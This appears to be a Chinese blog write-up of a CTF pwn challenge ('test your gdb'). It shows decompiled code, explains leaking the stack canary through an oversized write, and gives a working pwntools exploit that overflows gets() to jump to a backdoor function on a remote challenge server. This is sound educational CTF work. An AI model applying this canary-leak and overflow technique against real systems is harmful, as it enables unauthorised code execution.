nssctf-[HGAME 2022 week1]test your gdb

最新推荐文章于 2024-08-16 18:41:12 发布
最新推荐文章于 2024-08-16 18:41:12 发布
阅读量202 收藏
点赞数 3
分类专栏: pwn百题计划 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73818758/article/details/140314815
版权

checksec检查一下:

开启了Canary保护和NX保护,64位程序。

IDA打开程序:下面是程序的主要代码

unsigned __int64 __fastcall work(void *a1)
{
  char v2[256]; // [rsp+0h] [rbp-150h] BYREF
  __int64 v3[2]; // [rsp+100h] [rbp-50h] BYREF
  __int64 s2[2]; // [rsp+110h] [rbp-40h] BYREF
  char buf[16]; // [rsp+120h] [rbp-30h] BYREF
  char v6[24]; // [rsp+130h] [rbp-20h] BYREF
  unsigned __int64 v7; // [rsp+148h] [rbp-8h]

  v7 = __readfsqword(0x28u);
  v3[0] = 0xBA0033020LL;
  v3[1] = 0xC0000000D00000CLL;
  s2[0] = 0x706050403020100LL;
  s2[1] = 0xF0E0D0C0B0A0908LL;
  SEED_KeySchedKey(v2, v3);
  SEED_Encrypt(s2, v2);
  init_io();
  puts("hopefully you have used checksec");
  puts("enter your pass word");
  read(0, buf, 0x10uLL);
  if ( !memcmp(buf, s2, 0x10uLL) )
  {
    write(1, v6, 0x100uLL);
    gets(v6);
  }
  else
  {
    read(0, v6, 0x10uLL);
  }
  return __readfsqword(0x28u) ^ v7;
}

由代码可知,需要绕过Canary保护,当buf=s2时可以进入栈溢出代码,同时程序有后门函数。

我们需要利用write(1, v6, 0x100uLL);泄露出Canary的值,我的理解是将从v6开始的内存单元读取0x100个字节并写入1中,因此我们可以根据v7与v6的偏移将v7读取出来。

也就是p.recv()[0x20-0x8:0x20]

通过gdb调试可得s2的值(可直接用$rbp-0x40,无需自己计算出实际地址):

此时便可以开始编写exp

from pwn import *
p = remote("node5.anna.nssctf.cn",29656)

system_addr = 0x401256

payload = p64(0xb0361e0e8294f147) + p64(0x8c09e0c34ed8a6a9)
p.sendafter(b"enter your pass word\n",payload)
canary = u64(p.recv()[0x20-0x08:0x20])
print(hex(canary))
payload = b'a' * (0x20 - 0x08) + p64(canary) + p64(0) + p64(system_addr)
p.sendline(payload)
p.interactive()

注意接收Canary前发送payload选择send就行,如果用sendline会多发送一个换行符,这时Canary的接收就不是p.recv()[0x20-0x8:0x20]了

Wz0beu-淤青
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
vm虚拟机-简单题目(hgame-week4-easyvm、cg-ctf wxyVM1/2
01-08
然后先写了前面的cg-ctf的两个题目,其实当时做的时候还没太大虚拟机的感觉,后面接触到hgame的题目,然后再看的时候就感觉到有些那个意思,但是两个题目是基础题目也就不是太难为人,看成数据处理的考点也做的出来...
HGAME cdcollector-开源
04-24
【标题】"HGAME cdcollector-开源"是一个针对游戏收藏管理者的开源项目,它扩展了原有的cdcollector系统,特别设计用于管理和记录大量的电子游戏数据,尤其是HGAME(可能指的是成人向游戏)的数据库。这个系统利用...
NSSCTF Pwn Page 1 - 2
红叶的博客
03-14 1740
NSSCTF Pwn 第一页到第二页全部题目解析。 刷了大概一个月的NSSCTF,对Pwn的理解更高了,虽然也没高到哪去。
[HGAME 2022 week1]test your gdb
红叶的博客
03-06 407
word函数中,s2被加密,然后使用memcmp函数进行 buf 与 s2 的对比。main函数,个人理解是通过 pthread_create 函数创建并调用一个线程,创建的线程同等于 read(0,buf,0x28)。注意:一定不能使用sendline(v2),因为sendline会添加换行符,因此进入程序的下一个函数,而不是readfsqword。我们发送了16个字节的v2,也就是0x10大小的v2,我们还需要接收0x18大小的垃圾数据,之后的0x08才是我们的Canary。,也就是s2的内容。
hgame2022-week1
网安小菜鸡
01-15 4462
hgame2022-week1 wp(部分)
hgame 2022 week1
zip471642048的博客
02-09 900
Crypto Dancing Line 八位二进制走线图→=0 ↓=1 转ASCII码 exp from PIL import Image img = Image.open('Dancing Line.bmp') width,height = img.size pix_list = [[] for i in range(136)] for w in range(width): for h in range(height): pix = img.getpixel((w,h))
PWN-COMPETITION-HGAME2022-Week1
P1umH0的博客
01-28 1269
PWN-COMPETITION-HGAME2022Week1enter_the_pwn_landenter_the_evil_pwn_landoldfashion_orw(unsolved)ser_per_fa(unsol)test_your_nctest_your_gdb Week1 enter_the_pwn_land 栈溢出,需要注意的是下标 i 的地址比输入s的地址更高 s溢出会覆盖 i ,于是需要小心地覆写 i 的值,让循环顺利执行下去 然后就是常规的ret2libc # -*- coding:
NSSCTF PWN方向刷题记录
CyhStyrl的博客
04-03 707
流程:先添加note 0 再删除note 0 再添加note 1 并修改note1 内容为payload note1所在地址空间实则为note 0 所在位置(free后指针没有置为null 存在UAF漏洞)
0hgame:用0h制作的游戏->阅读README
05-01
(对于那些谁是它asceptical, ) 规则: 1- No one talk about fight club (?)2- DO NOT TOUCH BLACK THINGS IF YOU DONT WANT TO START AGAIN3- Try to reach the other side of the window to became the king ...
hgame:Haskell 游戏引擎
05-30
【Hgame:Haskell游戏引擎】是一个开源项目,旨在利用Haskell这门纯函数式编程语言来构建高效、灵活的游戏开发框架。Haskell以其强大的类型系统、 lazy evaluation(惰性求值)特性以及对并行和并发的良好支持,为...
单表替换密码算法破解工具
01-15
网络密码中介绍的基本加密方法,与凯撒密码相似,该软件提供基本的替换功能
hgame 2022 PWN 部分题目 Writeup
02-18 3354
hgame 2022 pwn 部分题目writeup
特洛伊木马:现代网络安全的隐形威胁
最新发布
weixin_48579910的博客
08-16 263
特洛伊木马是一种伪装成合法软件或文件的恶意程序。攻击者利用这种伪装,使受害者在不知情的情况下主动安装或运行木马,从而为攻击者打开了进入目标系统的大门。与病毒不同,木马并不会自我复制,而是通过社会工程学等手段诱使用户下载和执行。特洛伊木马虽然是网络世界中的“老兵”,但其隐蔽性和多样性使得它至今仍然是网络安全的一大威胁。了解木马的工作原理和危害,并采取适当的防范措施,可以帮助我们在数字化生活中更加安全地航行。
H5直播行业的安全挑战:为何害怕黑客攻击?
@云安全小杜
08-13 420
随着移动互联网的快速发展,H5直播因其便捷性和互动性成为众多平台的选择。然而,这种开放性和交互性也带来了安全风险,使得H5直播行业成为了黑客攻击的目标之一。本文将探讨H5直播面临的常见威胁,并提供一些基本的防御措施。
GPS叉车安全管理系统,远程监控管理车辆,保障叉车资产安全
jiuxindianzi的博客
08-16 270
九盾叉车监管系统利用GPS技术实现叉车全面监管,含IC卡指纹认证、无线实时测速、安全带报警器及小程序后台管理,提升安全性、效率及管理水平,降低运营成本。
IDS 与 IPS:网络安全的两道防线
hakksjss的博客
08-16 123
然而,IDS 也存在一定的局限性。它就像是网络世界中的“哨兵”,时刻保持警惕,依据一定的安全策略,分析网络数据包、系统日志等信息,试图发现各种潜在的攻击企图、入侵行为以及异常活动。此外,IPS 的误报率也是一个需要关注的问题,如果错误地拦截了正常的流量,可能会影响业务的正常运行。如果确定为攻击行为,IPS 则根据预先设置的规则和策略,立即阻断相关的流量,防止攻击对网络造成更大的破坏。它串联在网络中,实时分析流经的网络流量,一旦发现与已知攻击模式或异常行为相符的流量,立即采取行动,防止攻击的进一步扩散。
安全密码算法:SM3哈希算法介绍
Angelic_lan的博客
08-16 541
国密算法之一,哈希算法的一种,也是密码杂凑算法。可以将不定长的输入消息message,经过SM3算法计算后输出为32B固定长度的哈希值(hash value)。哈希算法的实质是单向散列函数(one-way hash function),其特点是,输入数据有1bit的改变都有很大概率会产生不同的散列值,因而很多场景中会使用散列值来验证输入消息的完整性。
请你完善上面的代码 添加从E:\Desktop\2024hgame\week1\crypto\奇怪的图片\png_out文件夹里面获取图片的功能
02-04
以下是完善代码的示例,添加...folder_path = "E:/Desktop/2024hgame/week1/crypto/奇怪的图片/png_out" # 获取文件夹中的图片 images = get_images_from_folder(folder_path) # 在代码中使用获取到的图片 # ... ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值